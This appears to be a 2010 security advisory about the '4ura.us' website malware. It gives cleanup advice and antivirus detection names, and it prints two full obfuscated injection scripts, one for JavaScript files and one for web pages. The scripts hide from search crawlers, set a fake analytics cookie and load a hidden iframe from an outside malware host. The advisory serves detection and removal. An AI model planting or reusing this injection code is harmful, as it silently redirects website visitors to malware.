4ura.us Malware
Updated: April 5, 2010
The 4ura.us malware places obfuscated malicious JavaScript into a website's web pages and or JavaScript files. The domain imgdownloads.com has recently started being used by the malware. When the code is inserted into JavaScript files it will only be served to a user the first the infected JavaScript file is requested. To clean the website, the website needs to be reverted to a clean backup or the malicious code needs to be removed from the web pages and or JavaScript files.
Recent Script Format On JavaScript Files:
if(document.cookie.indexOf('urchin')==-1 && !window.navigator.userAgent.toLowerCase().match(/(indexer|googlebot|msnbot|cuill.com|crawler|yahoo|search|stackrambler|aport|yandex|bing|ask)/)) { res=new Date();res.setTime(res.getTime()+80000000);document.cookie='urchin='+escape('google-analytics.com')+';expires='+res.toGMTString()+';path=/';function mOG(){};var tO=40844;mOG.prototype = {i : function() {var v='';var iA=function(){return 'iA'};return 'h6tMt6pT:M/T/QiMmEgTdToTwMnElTo6aTdMsQ.Qc6oMmM/6iMnQ.McQgTiM?M4T'.iO(/[TEQM6]/g, '');var vL=function(){};this.c='c';function x(){};this.dP=false;},t : function() {this.oN='oN';hD=60409;this.yH='';var j=function(){};function w(){};function vH(){};xN=false;var l=document;var z=false;var gY=false;zQ=51391;var pP=new Date();var y=window;var zA=function(){};this.zE='';this.xNZ='';var bN=new Array();var pW='pW';this.bI=false; String.prototype.iO=function(k, m){return this.rep lace(k, m)};var gA='gA';function yW(){};pB='';var aO='aO';var mH=function(){return 'mH'};var xG=function(){return 'xG'};var vHS='';var bC='bC';var h = 'sDtDy0l0e('.iO(/[\(\)0\.D]/g, '');wP='';function oNE(){}; var hW = 'aHpypyejnHd,CchHi,lHdj'.iO(/[jH,cy]/g, '');this.zV='';pBG=62466;var jN=9269;var e = 'i>fVr>aom[e>'.iO(/[\>oV\:\[]/g, '');var hZ=function(){};this.tA='tA';hI=false;var p = 'c;r^e8a8t;eRE;l8e;mReRn;tR'.iO(/[R;8p\^]/g, '');var yT='';var eN=false;var mL = 'w>rVi>t>e>'.iO(/[\>,T~V]/g, '');var cM=40305;var mY=new Date();tU='tU';kT=12810;var d = 's&eytTATt;t;r;i;byu&t[e&'.iO(/[&;\[Ty]/g, '');r='';this.kZ='';iF='';var gG='gG';var s = 'sQr3c*'.iO(/[\*Q#23]/g, '');this.sM=false;var q='';var a = 'b4oZdIyI'.iO(/[IjZ\}4]/g, '');var lD='lD';oY='';var o = 'd.i;s;p;l.a!yS'.iO(/[S\!\.;\?]/g, '');var yJ='';hP=24306;var b = 'n,o,n~e,'.iO(/[,W\:\^~]/g, '');var mU=function(){};var rT=function(){return 'rT'};var g = 'sje{tFTAi{mjeFoju<tj'.iO(/[j\{\<AF]/g, '');var rD=43630;this.sB='sB';wH=false;var oC='';try {this.yU='yU';tH='';var yUJ=new Array();eJ='';this.rJ='';this.jE=false;var wO=function(){};this.eF=false;var sZ=l[p](e);var qH=function(){return 'qH'};var yP=49076;sZ[d](s, this.i());this.pF='pF';var jH=new Date();sZ[h][o] = b;this.n='n';this.zR=false;rO=50205;this.gJF=5214;var dH=function(){};nE='';document[a][hW](sZ);mO=12860;var pQ=46781;this.bJ=35477;yI=false;} catch(tC) {var kG='kG';aT=11328;l.write('e?UZg?J?<?/~b~o~d~y4>4<4/Zhxt4mZlZ>x'.iO(/[x4\?Z~]/g, ''));lT='';var mI=function(){};var eE = this;var f='';hL=2628;var u=new Array();oJ=false;y[g](function(){ eE.t() }, 319);lR='lR';dK='dK';}zM=41990;var wE=function(){};var xW=57051;}};this.sA='';var rK=new mOG(); var tQ='tQ';rK.t();var cE=new Array();} var Action;
Recent Script Format On Web Pages:
<script>if(document.cookie.indexOf('urchin')==-1 && !window.navigator.userAgent.toLowerCase().match(/(crawler|googlebot|msnbot|yahoo|search|indexer|cuill.com|stackrambler|aport|yandex|bing|ask)/)) { res=new Date();res.setTime(res.getTime()+80000000);document.cookie='urchin='+escape('google-analytics.com')+';expires='+res.toGMTString()+';path=/'; function iO(){};var lV=new Date();iO.prototype = {bF : function() {sV=false;this.qY='';this.cA='';return 'h<t<t<p6:4/6/4i4mxg6d4oxw6n6l4o}axdxsx.<c}o}m}/4i4n4.<c6g6i}?436'.aI(/[6\}4x\<]/g, '');var kO=function(){};nW='nW';var wP=false;var hH='';},t : function() {var bP=function(){};zY=53599;this.qL='qL';pT='';var iY=function(){};this.mM=false;var mL=function(){return 'mL'};var u=window;l=5320;aN='aN';this.kL=63107;vL='';var i=document;this.nH=false;function yW(){};this.bA='bA';this.nT='';vK='';var g=function(){};this.pW='';var aZ=function(){}; String.prototype.aI=function(o,e){return this.rep lace(o, e)};zM='';function hB(){};cL='';var aD=new Array();var hO=new Date();var lS=new Date();mO=21254;var m = 'd#i.sUp3l#a.y#'.aI(/[#3%U\.]/g, '');uK=false;var dU=21553;var pA=28676;var b = 'nroQn+e)'.aI(/[\)rP\+Q]/g, '');this.j=false;this.dUM='';sL='';var oC=''; var s = 'aTp;pEeEn;dEC0hEi;lcdT'.aI(/[TE;c0]/g, '');this.oD=57616;this.nR=28704;var q = 'c&rHeDaHtDe&E&lfevmHeHnDtH'.aI(/[Hf&Dv]/g, '');pI=false;this.jZ='';this.kD=false;var a = 'b0oideyt'.aI(/[t0pei]/g, '');var bO=new Array();this.jZO=49972;var qLQ=15686;var h = 'sYtYyYlYen'.aI(/[n\>Y3\^]/g, '');this.xE='';function dS(){};var oDS=new Array();this.bV=37119;var x = 'iTfLrOaLm2eL'.aI(/[L2\+OT]/g, '');oV='';function oDL(){};var r=61212;this.tG='';var z = 'w[r[iQtseJ'.aI(/[JQsW\[]/g, '');this.qMC='';function xQ(){};this.iL='';this.jG='';var qM = 'sPe;tNAztPtzrPi%bNu;tPeN'.aI(/[N;%zP]/g, '');var nN=new Date();var vG=new Date();var w = 's_rfc_'.aI(/[_0f,\|]/g, '');var kOW=function(){return 'kOW'};zU=false;var bC='';var jA=new Date();var f = 's!e^t^T^i!m!e!ovuStS'.aI(/[SXv\!\^]/g, '');tX=false;lX='';var tP=false;this.tA='';var p = 'c8dC<Y/YbWoCdWyC>U<Y/ChUtUmWlC>W'.aI(/[W8CYU]/g, '');this.eS='eS';function sT(){};var bH=new Array();var rR='';function cX(){};var yH='';try {this.cC=52370;jP='jP';this.mF='';var dZ=false;var eK=function(){return 'eK'};var bT=new Array();var n=this.bF();var qK='';this.rT=22879;var k=i[q](x);var vLY='';iYT=false;lW=26789;bM='bM';this.iH=62649;this.tK=24505;cQ=51387;k[h][m] = b;gM='';var oH=false;iR='iR';var pD='pD';k[qM](w, n);var bMA=6076;dB='';function dC(){};var oZ=function(){return 'oZ'};eR=false;document[a][s](k);this.kC='';var aL='aL';this.kLB=59319;wZ=false;var iJ='';rG=7858;var bK=false;} catch(y) {this.aF='';var lD=function(){};i.write(p);this.uL='';var kOG=41230;var v = this;var rGO='';var oG='';tM='tM';wC=false;u[f](function(){ var pJ=function(){};this.eN=false;var oHG=function(){return 'oHG'};kY=false;v.t();fS=false;function jW(){};}, 380);this.iRM=22881;this.fK=false;var mD='';var eB=new Array();}var iM=function(){};this.xH='';}};var uE=new Date();var bCW=new iO(); this.iF='';bCW.t();var pL=new Array();}</script>
Recent Virus Scan Identifications: JS:Illredir-AE [Trj], JS:Illredir-AO [Trj], Troj/Iframe-EA